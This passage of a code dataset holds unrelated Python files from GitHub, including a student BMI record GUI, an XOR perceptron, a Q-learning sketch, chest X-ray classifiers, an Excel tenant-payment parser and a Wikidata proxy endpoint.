elif x>=44 and x<=56 and y<=32 and y>=28:\n op=2\n return op\n elif x>=44 and x<=56 and y<=27 and y>=23:\n op=3\n return op\n elif x>=44 and x<=56 and y<=22 and y>=18:\n op=4\n return op\n elif x>=44 and x<=56 and y<=17 and y>=13:\n op=5\n return op\n elif x>=44 and x<=56 and y<=7 and y>=3:\n op=6\n return op\n else:\n op=7\n return op\n\ndef convertToBMI(weight, height):\n bmi = int(weight) / (int(height) *int(height)) * 703\n return bmi\n\ndef bmiResult(bmi):\n#TODO: Check what BMI category the student is using bmi\n if bmi<=18.5:\n bmiresult=\"Underweight\"\n elif bmi>=18.5 and bmi<=24.9:\n bmiresult=\"Normalweight\"\n elif bmi>=25 and bmi<=29.9:\n bmiresult=\"Overweight\"\n else:\n bmiresult=\"Obese\"\n return bmiresult\n\ndef targetWeight(bmi, weight, height):\n optimalweight =0\n if bmi<= 18.5 or bmi>25:\n optimalbmi = (18.5+24.9)/2\n #TODO:\n #Calculate the optimal weight using optimalbmi, height and weight\n optimalweight=(optimalbmi*height*height)/703\n return int(optimalweight)\n else:\n return weight\n\n\ndef main():\n win = GraphWin(\"Student Health Record System\", 600, 400)\n win.setCoords(0.0, 0.0, 60, 40)\n textFn = Text(Point(6, 35), \"File Name:\")\n textFn.draw(win)\n textId = Text(Point(6, 31), \"Student ID:\")\n textId.draw(win)\n textName = Text(Point(6, 27), \"Student Name:\")\n textName.draw(win)\n textWeight = Text(Point(6, 23), \"Weight(Lbs):\")\n textWeight.draw(win)\n textHeight = Text(Point(6, 19), \"Height(Inches):\")\n textHeight.draw(win)\n bmiLetter = Text(Point(6, 15), \"BMI Category:\")\n bmiLetter.draw(win)\n\n \n textButtonOpen = Text(Point(50, 35), \"Open\")\n textButtonOpen.draw(win)\n textButtonAdd = Text(Point(50, 30), \"Find Student\")\n textButtonAdd.draw(win)\n textButtonFind = Text(Point(50, 25), \"Add Student\")\n textButtonFind.draw(win)\n textButtonSave = Text(Point(50, 20), \"Change Weight\")\n textButtonSave.draw(win)\n textButtonTarget = Text(Point(50, 15), \"Advise Weight\")\n textButtonTarget.draw(win)\n textButtonQuit = Text(Point(50, 5), \"Quit\")\n textButtonQuit.draw(win)\n textMessage = Text(Point(20, 5), \"Enter the health record file name and click Open.\")\n textMessage.setTextColor(\"Blue\")\n textMessage.draw(win)\n \n buttonOpen = Rectangle(Point(56,33),Point(44,37))\n buttonOpen.draw(win)\n buttonFind = Rectangle(Point(56,28),Point(44,32))\n buttonFind.draw(win)\n buttonAdd = Rectangle(Point(56,27), Point(44,23))\n buttonAdd.draw(win)\n buttonSave = Rectangle(Point(56,22), Point(44,18))\n buttonSave.draw(win)\n buttonTarget = Rectangle(Point(56,17), Point(44,13))\n buttonTarget.draw(win)\n buttonQuit = Rectangle(Point(56,7), Point(44,3))\n buttonQuit.draw(win)\n \n fnInput = Entry(Point(24, 35), 25)\n fnInput.draw(win)\n idInput = Entry(Point(24, 31),25)\n idInput.draw(win)\n nameInput = Entry(Point(24,27),25)\n nameInput.draw(win)\n weightInput = Entry(Point(24,23),25)\n weightInput.draw(win)\n heightInput = Entry(Point(24,19),25)\n heightInput.draw(win)\n bmiTextInput = Entry(Point(24, 15), 25)\n bmiTextInput.draw(win)\n\n #TODO: create all lists to be used in the program\n id_lst=[]\n name_lst=[]\n weight_lst=[]\n height_lst=[]\n opened=0\n \n while True: # This is the main loop\n click = win.getMouse()\n op = checkClickPosition(click)\n if op == 1: #click on Open\n #Operations for opening a file, read info into lists and close the file\n fn=fnInput.getText()\n filein=open(fn,'r')\n read=filein.readlines()\n length=len(read)\n filein.seek(0)\n for i in range(length):\n lines=filein.readline()\n if lines==\"\\n\":\n pass\n else:\n linesplit=lines.split(\"\\t\")\n id_lst.append(linesplit[0])\n name_lst.append(linesplit[1])\n weight_lst.append(linesplit[2])\n height_lst.append(linesplit[3])\n opened=1 \n textMessage.setText(\"File {0} opened\".format(fn)) \n \n elif op == 2: #click on Find\n #Operations for Finding a Student\n idnum=idInput.getText()\n tf=idnum in id_lst\n if opened==1:\n if tf==True: #If there exists a student with the Student ID\n pos=id_lst.index(idnum)\n nameInput.setText(name_lst[pos])\n weightInput.setText(weight_lst[pos])\n heightInput.setText(height_lst[pos])\n bmi=convertToBMI(int(weight_lst[pos]),int(height_lst[pos]))\n bmiresult=bmiResult(bmi)\n bmiTextInput.setText(bmiresult)\n textMessage.setText(\"Student with ID{0} found in the system\".format(idnum))\n else: #If there is no student with the student ID\n textMessage.setText(\"Student with ID{0} does not exist\".format(idnum))\n nameInput.setText(\"\")\n weightInput.setText(\"\")\n heightInput.setText(\"\")\n bmiTextInput.setText(\"\")\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 3: #click on Add\n #Operations for Adding a Student\n name=nameInput.getText()\n idnum=idInput.getText()\n weight=weightInput.getText()\n height=heightInput.getText()\n if opened==1:\n if idnum in id_lst: #If there exists a student with the student ID \n textMessage.setText(\"Student ID already exist in the system\")\n else: #If there is no student with the student ID\n if name==\"\" or weight==\"\" or height==\"\":\n textMessage.setText(\"Information for Student{0} is missing\".format(idnum))\n else: \n id_lst.append(idnum)\n name_lst.append(name)\n weight_lst.append(weight)\n height_lst.append(height)\n textMessage.setText(\"Student Information has been added\")\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 4: #click on Change Weight\n #Operations for changing the weight of a student\n idnum=idInput.getText()\n tf=idnum in id_lst\n weight=weightInput.getText()\n if opened==1:\n if tf==True : #If there exists a student with the student ID, change weight\n pos=id_lst.index(idnum)\n weight_lst[pos]=weight\n textMessage.setText(\"Student's Weight has been changed\")\n else: #If there is no student with the student ID\n textMessage.setText(\"Student with ID{0} does not exist\".format(idnum))\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 5: #click on Advise Weight\n #Operations for checking a Student's weight\n idnum=idInput.getText()\n tf=idnum in id_lst\n if opened==1:\n if tf==True: # There exists a student with the given student ID\n pos=id_lst.index(idnum)\n bmi=convertToBMI(weight_lst[pos],height_lst[pos])\n bmiresult=bmiResult(bmi)\n if bmiresult==\"Normalweight\": #If the student is in the right weight range\n textMessage.setText(\"Student's target weight is {0}lbs\".format(weight_lst[pos]))\n else: #If the student is underweight or overweight or obese\n weightx=eval(weight_lst[pos])\n heightx=eval(height_lst[pos])\n targetweight=targetWeight(bmi,weightx,heightx)\n textMessage.setText(\"Student{0}'s target weight is {1}lbs\".format(id_lst[pos],targetweight))\n else: #If there is no student with the student ID\n textMessage.setText(\"Student with ID{0} does not exist\".format(idnum))\n else:\n textMessage.setText(\"You have not opened a file yet\")\n pass\n \n elif op == 6: #click on Quit\n #Writing the lists to the file and get out of the main loop\n if opened==1:\n filein.close()\n outfile=open(fn,'w')\n lp=len(id_lst)\n for i in range(lp):\n outfile.write(id_lst[i])\n outfile.write(\"\\t\")\n outfile.write(name_lst[i])\n outfile.write(\"\\t\")\n outfile.write(weight_lst[i])\n outfile.write(\"\\t\")\n outfile.write(height_lst[i])\n outfile.write(\"\\n\")\n outfile.close()\n break\n else:\n break\n else:\n # possible error conditions\n pass\n \n win.close()\n\nmain()\n","repo_name":"dereky1/schoolcoursework","sub_path":"EECS12/hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30621747426","text":"import numpy as np\r\nfrom numpy import random\r\nfrom random import randint\r\n\r\ndef binary (x):\r\n if x > 0:\r\n return 1\r\n elif x < 0:\r\n return 0\r\n \r\ndef sigmoid (x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\ndef sigmoid_derivative (x):\r\n return np.exp(-x) / (1 + np.exp(-x)) ** 2\r\n\r\npattern = [[0,0], [0,1], [1,0], [1,1]]\r\nx = np.asarray(pattern)\r\ny = [0, 1, 1, 0]\r\n# random weight \r\nrand1 = np.random.randint(0, 10, (1, 6))\r\nrand2 = np.random.randint(-10, 0, (1, 2))\r\nw00 = rand1[0][0]\r\nw01 = rand1[0][1]\r\nw02 = rand1[0][2]\r\nw03 = rand1[0][3]\r\nw04 = rand1[0][4]\r\nw05 = rand1[0][5]\r\nw11 = rand2[0][0]\r\nw12 = rand2[0][1]\r\n\r\nerror = np.zeros(10)\r\nlearning_rate = 0.01\r\n# modify the weights until error == 0\r\nwhile True:\r\n for i in range(len(x)):\r\n x1, x2 = x[i][0], x[i][1]\r\n y_true = y[i]\r\n s1 = w00 + x1 * w02 + x2 * w04\r\n a1 = sigmoid(s1)\r\n s2 = w01 + x1 * w03 + x2 * w05\r\n a2 = sigmoid(s2)\r\n s3 = a1 * w11 + a2 * w12\r\n y_act = binary(s3)\r\n error[i] = y_true - y_act \r\n if error[i] != 0 : \r\n pass\r\n # modifying the weights \r\n w11 += learning_rate * error[i] * a1\r\n w12 += learning_rate * error[i] * a2 \r\n w00 += learning_rate * (w11 * error[i]) * sigmoid_derivative(s1) * 1\r\n w01 += learning_rate * (w12 * error[i]) * sigmoid_derivative(s2) * 1\r\n w02 += learning_rate * (w11 * error[i]) * sigmoid_derivative(s1) * x1\r\n w03 += learning_rate * (w12 * error[i]) * sigmoid_derivative(s2) * x1\r\n w04 += learning_rate * (w11 * error[i]) * sigmoid_derivative(s1) * x2\r\n w05 += learning_rate * (w12 * error[i]) * sigmoid_derivative(s2) * x2\r\n if np.all((error == 0)): \r\n print(\"w00:\", w00)\r\n print(\"w01:\", w01)\r\n print(\"w02:\", w02)\r\n print(\"w03:\", w03)\r\n print(\"w04:\", w04)\r\n print(\"w05:\", w05)\r\n print(\"-----------------------\")\r\n print(\"w11:\", w11)\r\n print(\"w12:\", w12) \r\n break \r\n","repo_name":"hmadinei/xor_perceptron_learning","sub_path":"XOR.py","file_name":"XOR.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30807169045","text":"class Solution:\n def jump(self, nums: List[int]) -> int:\n if len(nums) < 2:\n return 0\n maxRange = nums[0]\n index = 0\n cnt = 1\n while maxRange < len(nums) - 1:\n for i in range(index, maxRange+1):\n if nums[i] + i > maxRange:\n maxRange = nums[i] + i\n index = i\n cnt += 1\n return cnt\n ","repo_name":"qinhanhu/leetcode","sub_path":"l45_jump_game2.py","file_name":"l45_jump_game2.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31472796173","text":"\"\"\"Implementation of the Smoothed L0 Optimisation algorithm developed by Mohimani et al, see http://ee.sharif.edu/~SLzero/ for details.\"\"\"\r\n\r\nimport numpy as np\r\nfrom math import exp\r\n\r\ndef gaussian_F(x_i, sigma):\r\n \"\"\"Calculate the maximisation function f_{sigma} for an element of the vector x\"\"\"\r\n x = np.abs(x_i)\r\n return x_i * exp(-1*x*x/(2*sigma*sigma))\r\n\r\nFsigma_gauss = np.vectorize(gaussian_F, otypes=[np.complex_]) #Vectorize the gaussian function\r\n#Fsigma_gauss = np.vectorize(gaussian_F, otypes=[np.float64]) #Vectorize the gaussian function\r\n\r\ndef SL0(A, b, sigma_min, **kwargs):\r\n \"\"\"Function that performs the SL0 algorithm given the matrix A and b, and a minimum value of sigma.\r\n Arguments: \r\n - A: numpy matrix\r\n - b: numpy matrix\r\n - sigma_min: Float, minimum value of the approximation parameter sigma. A sensible default is 1e-12\r\n Optional keyword arguments:\r\n - FSigma: vectorized function that takes an element of a vector, and the parameter sigma, as arguments. Defaults to\r\n the Gaussian form used by the authors\r\n - L: Number of steps of the gradient ascent step, defaults to 3\r\n - mu_0: Gradient in the gradient ascent step, defaults to 2\r\n - sigma_decrease: Amount by which the approximation parameter decreases each step\r\n \"\"\"\r\n #Defaults for mu_0, L, decrease factor taken from the paper\r\n Fsigma = kwargs.pop('Fsigma', Fsigma_gauss)\r\n mu_0 = kwargs.pop('mu_0', 2)\r\n L = kwargs.pop('L', 3)\r\n sdf = kwargs.pop('sigma_decrease',0.5)\r\n A_plus = np.linalg.pinv(A)\r\n x = np.dot(A_plus,b)\r\n sigma = 2*np.max(np.abs(x))\r\n while sigma > sigma_min:\r\n for i in range(L): #Do L rounds of gradient ascent\r\n delta = Fsigma(x, sigma)\r\n x -= mu_0*delta\r\n x -= np.dot(A_plus , (np.dot(A,x)-b))\r\n sigma *= sdf #Sigma decrease factor value chosen b the authors\r\n return np.around(x, decimals=10) \r\n","repo_name":"perepichka/ceha","sub_path":"ceha/SL02.py","file_name":"SL02.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"22817675367","text":"# 019 BMI 계산기\n# 사용자로부터 사람의 키(인치 단위), 몸무게(파운드 단위)를\n# 입력 받아 BMI를 계산하는 프로그램을 작성하라.\n# BMI = (weight/(height * height))*703\n\n# Example\n# Your BMI is 19.5\n# You are within the ideal weight range.\n\n# Your BMI is 32.5\n# You are overweight. You should see your doctor.\n\nweight = int(input(\"Weight: \"))\nheight = int(input(\"Height: \"))\nbmi = weight / (height ** 2) * 703\n\nprint(\"Your BMI is %.1f\" % bmi)\n\nif bmi > 22.5:\n print(\"You are overweight. You should see your doctor.\")\nelif bmi < 19:\n print(\"You are underweight. You should see your doctor.\")\nelse:\n print(\"You are wihtin the ideal weight range.\")\n\n","repo_name":"BackToTheSchool/assignment_hw","sub_path":"171107_Python/019.py","file_name":"019.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8518286425","text":"class Solution:\n def findSubarrays(self, nums: List[int]) -> bool:\n n = len(nums)\n d = defaultdict(int)\n for i in range(n-1):\n if nums[i] + nums[i+1] in d:\n return True\n else:\n d[nums[i] + nums[i+1]] += 1\n return False","repo_name":"gurjotsc/gcheema-cp","sub_path":"leetcode/easy/findSubarraysWithEqualSum.py","file_name":"findSubarraysWithEqualSum.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7907699570","text":"\nimport gym\nimport numpy as np\nfrom sklearn.pipeline import FeatureUnion\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.kernel_approximation import RBFSampler\nfrom sklearn.linear_model import SGDRegressor\n\nenv = gym.make('MountainCar-v0')\n\nclass SGDRegressor:\n def __init__(self, **kwargs):\n self.w = None\n self.lr = 1e-2\n\n def partial_fit(self, X, Y):\n if self.w is None:\n D = X.shape[1]\n self.w = np.random.randn(D) / np.sqrt(D)\n self.w += self.lr*(Y - X.dot(self.w)).dot(X)\n\n def predict(self, X):\n return X.dot(self.w)\n\n\nclass FeatureTransformer:\n def __init__(self, env, n_components=500):\n # Retira 10000 Estados aleatorios \n observation_examples = np.array([env.observation_space.sample() for x in range(10000)])\n scaler = StandardScaler()\n scaler.fit(observation_examples)\n\n # Used to converte a state to a featurizes represenation.\n # We use RBF kernels with different variances to cover different parts of the space\n featurizer = FeatureUnion([\n (\"rbf1\", RBFSampler(gamma=5.0, n_components=n_components)),\n (\"rbf2\", RBFSampler(gamma=2.0, n_components=n_components)),\n (\"rbf3\", RBFSampler(gamma=1.0, n_components=n_components)),\n (\"rbf4\", RBFSampler(gamma=0.5, n_components=n_components))\n ])\n example_features = featurizer.fit_transform(scaler.transform(observation_examples))\n\n #print(example_features)\n\n self.dimensions = example_features.shape[1]\n self.scaler = scaler\n self.featurizer = featurizer\n\nclass Model:\n def __init__(self, env, feature_transformer, learning_rate):\n self.env = env\n self.models = []\n self.feature_transformer = feature_transformer\n for i in range(env.action_space.n):\n model = SGDRegressor(learning_rate=learning_rate)\n model.partial_fit(feature_transformer.transform( [env.reset()] ), [0])\n self.models.append(model)\n\n def predict(self, s):\n X = self.feature_transformer.transform([s])\n result = np.stack([m.predict(X) for m in self.models]).T\n assert(len(result.shape) == 2)\n return result\n\n def update(self, s, a, G):\n X = self.feature_transformer.transform([s])\n assert(len(X.shape) == 2)\n self.models[a].partial_fit(X, [G])\n\n def sample_action(self, s, eps):\n # eps = 0\n # Technically, we don't need to do epsilon-greedy\n # because SGDRegressor predicts 0 for all states\n # until they are updated. This works as the\n # \"Optimistic Initial Values\" method, since all\n # the rewards for Mountain Car are -1.\n if np.random.random() < eps:\n return self.env.action_space.sample()\n else:\n return np.argmax(self.predict(s))\n\ndef play_one(model,eps,gamma,n=5):\n\n observation = env.reset()\n done = False\n totalReward = 0\n rewards = []\n states = []\n actions = []\n iters = 0\n\n # Este Array Guarda os Lambdas\n # [ Gamma^0, Gamma^1, (...), Gamma^T-1]\n multiplier = np.array([gamma]*n)**np.arange(n)\n \n while not done and iters < 10000:\n\n # Epsilon Greedy\n action = model.sample_action(observation,eps)\n\n # Store Action and State\n states.append(observation)\n actions.append(action)\n\n # Execute Action\n prev_observation = observation\n observation, reward, done, info = env.step(action)\n\n # Store Reward\n rewards.append(reward)\n\n # Update Model\n # To Update The Model We need at least N rewards\n if len(rewards) >= n:\n \n # Return up to prediction\n # G = R(t+1)*Gamma^0 + R(t+2)*Gamma^1 + ... + R(t+T)*Gamma^T-1\n # rewards[-n:] => Todos os valores \n return_up_to_prediction = multiplier.dot(rewards[-n:])\n\n \n \n\n\n#if __name__ == '__main__':\n\n #env = gym.make('MountainCar-v0')\n #ft = FeatureTransformer(env)\n\n\n\n\n \n","repo_name":"DinisSanchesFernandes/RL_StateOfTheArt","sub_path":"MountainCar/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14979061095","text":"from keras.models import load_model\nimport tensorflow as tf\nfrom numpy import array\nimport torch\n\n\ndef load_img(fetch_dir):\n img = tf.keras.preprocessing.image.load_img(fetch_dir,target_size=(128,128))\n input_arr = tf.keras.preprocessing.image.img_to_array(img)/255\n input_arr = array([input_arr]) \n return input_arr\n \ndef bietapic_1(fetch_dir): \n img = load_img(fetch_dir)\n bietapic_1 = load_model('Filtro_Bietapico_Primero.h5')\n y = bietapic_1.predict(img,workers=8)\n biet_1_dict = {0: 'Chest', 1: 'Other'}\n preds = y.argmax(axis=-1)\n preds_c = [biet_1_dict[p] for p in preds]\n return y[0][0],preds_c[0]\n\ndef bietapic_2(fetch_dir):\n img = load_img(fetch_dir)\n bietapic_1 = load_model('Filtro_Bietapico_Segundo.h5')\n y = bietapic_1.predict(img,workers=8)\n biet_1_dict = {0: 'AP_horizontal', 1: 'L', 2: 'PA'}\n preds = y.argmax(axis=-1)\n preds_c = [biet_1_dict[p] for p in preds]\n return y[0],preds_c[0]\n\ndef opacity_detector(fetch_dir):\n img = load_img(fetch_dir)\n img = tf.keras.preprocessing.image.array_to_img(img[0])\n model = torch.hub.load('ultralytics/yolov5','custom',path='corrida_3.pt')\n results = model(img)\n print(results.pandas().xyxy[0])\n return results.pandas().xyxy[0]\n\n","repo_name":"euberrino/ssd-chest-xray","sub_path":"03. Complete model/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25278551928","text":"import geopandas as gpd\nimport pandas_gbq as gbq\n\nproject_id = \"serenity-gbq\"\ntable_id = \"demo\"\n\ndef ingest_shapefile_bigquery(**kwargs):\n geo_df = gpd.read_file(\"Vancouver-shp/shape/buildings.shp\")\n dataset_id = \"waterways\"\n print(geo_df)\n gbq.to_gbq(dataframe=geo_df,\n destination_table=dataset_id +\".\" +table_id,\n project_id=project_id,\n if_exists=\"replace\",\n # table_schema=specify_schema_object\n )\n\ningest_shapefile_bigquery()\n","repo_name":"jonhealy1/serenity-gbq","sub_path":"examples/pandas_gbq/geopandas-gbq.py","file_name":"geopandas-gbq.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34631598619","text":"# -*- coding: utf8 -*- \r\n\r\n#--------------------------------SMART-STEP REPORTES------------------------------------------------\r\nimport os\r\nimport fnmatch\r\nimport datetime\r\n\r\nimport dates\r\nimport xlrd\r\nimport excel_helper\r\nimport excel_utils\r\n\r\nimport utils\r\nimport elements\r\n \r\nclass ExcelRecord(object):\r\n def __init__(self, record): \r\n self.uncalculated = False\r\n \r\n for k, cell in record.items(): \r\n setattr(self, k, cell) \r\n \r\n #build monthly payment - relevant when monthly payment changes within the year\r\n self.monthlyColumns = sorted([int(k.split('_')[1]) for k in self.__dict__ if 'תשלום חודשי_' in k])\r\n \r\n \r\n @property\r\n def skip(self): \r\n return self.appartment == '*'\r\n \r\n @property\r\n def eof(self): \r\n return self.appartment == '' \r\n \r\n \r\n def monthlyData(self, year, excelCellInfoPerDate = None):\r\n \r\n \r\n #find columns in this sheet which represent months\r\n allMonths = sorted([k for k in self.__dict__ if dates.datify(k, year)], key= (lambda dateColumn: dates.datify(dateColumn))) \r\n \r\n #build monthly expected payments table\r\n monthlyExpectedPaymentOf = {} \r\n \r\n #if there are different expected payment throughtout this sheet, then monthlyColumns gets updated\r\n #ar the c'tor of the excel record\r\n if len(self.monthlyColumns):\r\n currExpectedPayment = self.payment\r\n for m in allMonths:\r\n if m in self.monthlyColumns:\r\n currExpectedPayment = int(getattr(self, 'תשלום חודשי_%d' % m))\r\n monthlyExpectedPaymentOf[m] = currExpectedPayment \r\n else:\r\n for m in allMonths:\r\n monthlyExpectedPaymentOf[m] = utils.Intify(self.payment)\r\n \r\n #calculate how much was paid during the whole period\r\n total_paid = sum( utils.Intify(self.monthlyPayment(month))\r\n for month in allMonths \r\n if self.monthlyPayment(month) is not None) \r\n\r\n for month in allMonths: \r\n \r\n cell_info = excelCellInfoPerDate[dates.datify(month, year)]\r\n \r\n expected_payment = monthlyExpectedPaymentOf[month]\r\n \r\n if not total_paid:\r\n actual_payment = 0\r\n \r\n else:\r\n if total_paid >= expected_payment:\r\n actual_payment = expected_payment\r\n \r\n else:\r\n actual_payment = total_paid\r\n \r\n total_paid -= actual_payment \r\n \r\n cell_info.payment_details.actual_payment = actual_payment\r\n cell_info.payment_details.expected_payment = expected_payment \r\n \r\n \r\n def monthlyPayment(self, month):\r\n return excel_utils.ExtractCellValueByColumn(self, str(month))\r\n \r\n \r\n \r\n @property\r\n def payment(self):\r\n #if payment does not exist, treat as 0 as it is defined integer in the data base\r\n return utils.Intify(excel_utils.ExtractCellValueByColumn(self, 'תשלום חודשי'))\r\n \r\n \r\n #payment = getattr(self, 'תשלום חודשי', '').decode('utf-8')\r\n \r\n ##payment can also be empty or text (indicating this is not debt) hence it is not always an integer\r\n #try:\r\n #return int(payment)\r\n #except ValueError: \r\n #return payment\r\n\r\n @property\r\n def appartment(self):\r\n app = excel_utils.ExtractCellValueByColumn(self, 'דירה')\r\n try:\r\n return int(app)\r\n except: \r\n return app.strip()\r\n \r\n @property\r\n def owner(self): \r\n return excel_utils.ExtractCellValueByColumn(self, 'שם בעלים')\r\n #return getattr(self, 'שם בעלים', '').decode('utf-8')\r\n \r\n @property\r\n def tenant(self):\r\n return excel_utils.ExtractCellValueByColumn(self, 'שם דיירים') \r\n #return getattr(self, 'שם דיירים', '').decode('utf-8')\r\n \r\n @property\r\n def ownerMails(self):\r\n return excel_utils.ExtractCellValueByColumn(self, 'מייל בעלים').split()\r\n #return getattr(self, 'מייל בעלים', '').decode('utf-8').split()\r\n \r\n @property\r\n def tenantMails(self):\r\n return excel_utils.ExtractCellValueByColumn(self, 'מייל דיירים').split()\r\n #return getattr(self, 'מייל דיירים', '').decode('utf-8').split()\r\n \r\n @property\r\n def ownerPhones(self): \r\n return excel_utils.ExtractCellValueByColumn(self, 'טלפון בעלים').split()\r\n #return getattr(self, 'טלפון בעלים', '').decode('utf-8').split()\r\n \r\n @property\r\n def tenantPhones(self): \r\n return excel_utils.ExtractCellValueByColumn(self, 'טלפון דיירים').split()\r\n #return getattr(self, 'טלפון דיירים', '').decode('utf-8').split()\r\n \r\n @property\r\n def isRepresentative(self): \r\n return False \r\n\r\ndef SupportedExcelExtentions():\r\n #smart step only uses xls suffix as this is the only supported type by xlrd that can \r\n #read the cell colors\r\n return ['.xls']\r\n\r\ndef GetGeneralSheet(excel_book):\r\n sheetsOf = {} \r\n sheets = excel_book.sheet_names()\r\n #scan and find interesting sheets\r\n for sheet_name in sheets: \r\n if utils.config.excelGeneralSheetPrefix in sheet_name:\r\n sheet = excel_book.sheet_by_name(sheet_name)\r\n try:\r\n #if after removing prefix, there are a few digits left besides numbers, then don't take \r\n #this sheet into account\r\n year = int(sheet_name.replace(utils.config.excelGeneralSheetPrefix, '').strip())\r\n except:\r\n continue\r\n \r\n \r\n \r\n #don't take future years into account\r\n if year <= datetime.date.today().year:\r\n sheetsOf[year] = sheet\r\n \r\n #build tenants personal details, based on the newest year\r\n return sheetsOf[max(sheetsOf)] if len(sheetsOf) else None\r\n \r\n \r\ndef GetPaymentSheets(excel_book):\r\n sheetsOf = {}\r\n sheets = excel_book.sheet_names()\r\n #scan and find interesting sheets\r\n for sheet_name in sheets:\r\n \r\n if utils.config.excelPaymentSheetPrefix in sheet_name:\r\n sheet = excel_book.sheet_by_name(sheet_name)\r\n \r\n try:\r\n #if after removing prefix, there are a few digits left besides numbers, then don't take \r\n #this sheet into account\r\n year = int(sheet_name.replace(utils.config.excelPaymentSheetPrefix, '').strip())\r\n except:\r\n continue \r\n \r\n #don't take future years into account\r\n if year <= datetime.date.today().year:\r\n sheetsOf[year] = sheet\r\n \r\n return sheetsOf if len(sheetsOf) else None\r\n \r\n \r\ndef GetTenant(excelRecord):\r\n if len(excelRecord.tenant):\r\n return elements.Person(excelRecord.tenant, excelRecord.tenantMails, excelRecord.tenantPhones)\r\n\r\ndef GetOwner(excelRecord):\r\n if len(excelRecord.owner):\r\n return elements.Person(excelRecord.owner, excelRecord.ownerMails, excelRecord.ownerPhones)\r\n \r\n \r\ndef ParseTenantsGeneralData(excel, buildingOf, dbBuildingName): \r\n \r\n book = excel_helper.OpenExcelFile(excel)\r\n if not book:\r\n return \r\n building_name = os.path.splitext(os.path.basename(excel).replace(utils.config.excelGeneralFilePrefix, '').strip())[0].strip() \r\n building = buildingOf[building_name]\r\n building.based_on_files.add(excel)\r\n building.building_name = building_name\r\n \r\n sheet = GetGeneralSheet(book)\r\n \r\n if not sheet:\r\n return \r\n \r\n #go over all excel rows, each represents an apartment\r\n for excelRecord in excel_helper.ExtractApartments(sheet, 2):\r\n \r\n apartment_number = excelRecord.appartment\r\n \r\n app = building.apartmentOf[apartment_number]\r\n \r\n app.apartment_number = apartment_number\r\n app.recent_payment = excelRecord.payment\r\n \r\n tenant = GetTenant(excelRecord) \r\n owner = GetOwner(excelRecord)\r\n \r\n if tenant or owner:\r\n #no owner, only tenant, so tenant is owner\r\n if not owner:\r\n app.owner = tenant\r\n app.owner.defacto = True\r\n else:\r\n #there is an owner\r\n app.owner = owner\r\n #if there is a tenant than he is the renter otherwise there is only an owner\r\n if tenant:\r\n app.renter = tenant\r\n app.renter.defacto = True\r\n else:\r\n app.owner.defacto = True\r\n \r\n #if no details for renter and owner store an empty person as owner\r\n else:\r\n app.owner = elements.Person()\r\n app.owner.defacto = True\r\n \r\n\r\ndef ParseTenantsPaymentData(excel, buildingOf, dbBuildingName):\r\n \r\n book = excel_helper.OpenExcelFile(excel)\r\n if not book:\r\n return\r\n building_name = os.path.splitext(os.path.basename(excel).replace(utils.config.excelPaymentFilePrefix, '').strip())[0].strip()\r\n \r\n building = buildingOf[building_name]\r\n building.based_on_files.add(excel)\r\n building.building_name = building_name \r\n\r\n #dict year->sheet\r\n sheetsOf = GetPaymentSheets(book)\r\n \r\n if not sheetsOf:\r\n return \r\n \r\n for (year, sheet) in sheetsOf.items(): \r\n #go over all excel rows, each represents an apartment\r\n for excelRecord in excel_helper.ExtractApartments(sheet, 2):\r\n \r\n apartment_number = excelRecord.appartment\r\n app = building.apartmentOf[apartment_number] \r\n excelRecord.monthlyData(year, app.excelCellInfoPerDate) \r\n \r\n\r\ndef ParseTenantSpecialsData(excel, buildingOf, dbBuildingName):\r\n return\r\n","repo_name":"omerbach/samm","sub_path":"customer_specific/smart-step/modules/customer_parser.py","file_name":"customer_parser.py","file_ext":"py","file_size_in_byte":10629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"15944381130","text":"\"\"\" Endpoints to proxy WikiData requests for info popups on the map \"\"\"\nfrom starlette.exceptions import HTTPException\nfrom starlette.responses import JSONResponse\nfrom data import get_wikidata, get_commons_thumbnail\nfrom util import cache_for\nfrom main import app\n\n\n@app.route(\"/wikidata/{wikidata_id}\")\n@cache_for(86400)\nasync def wikidata(request):\n wikidata_id = request.path_params['wikidata_id'].upper()\n\n response = {}\n data = await get_wikidata(wikidata_id)\n if data is None:\n raise HTTPException(404, \"Wikidata item not found\")\n\n response[\"sitelinks\"] = data[\"sitelinks\"]\n if (\n \"P18\" in data[\"claims\"]\n and data[\"claims\"][\"P18\"][0][\"mainsnak\"][\"datatype\"] == \"commonsMedia\"\n ):\n response[\"image\"] = data[\"claims\"][\"P18\"][0][\"mainsnak\"][\"datavalue\"][\"value\"]\n image_data = await get_commons_thumbnail(\n data[\"claims\"][\"P18\"][0][\"mainsnak\"][\"datavalue\"][\"value\"]\n )\n\n response[\"thumbnail\"] = image_data[\"imageinfo\"][0][\"thumburl\"]\n\n return JSONResponse(\n response,\n headers={\"Access-Control-Allow-Origin\": \"*\"},\n 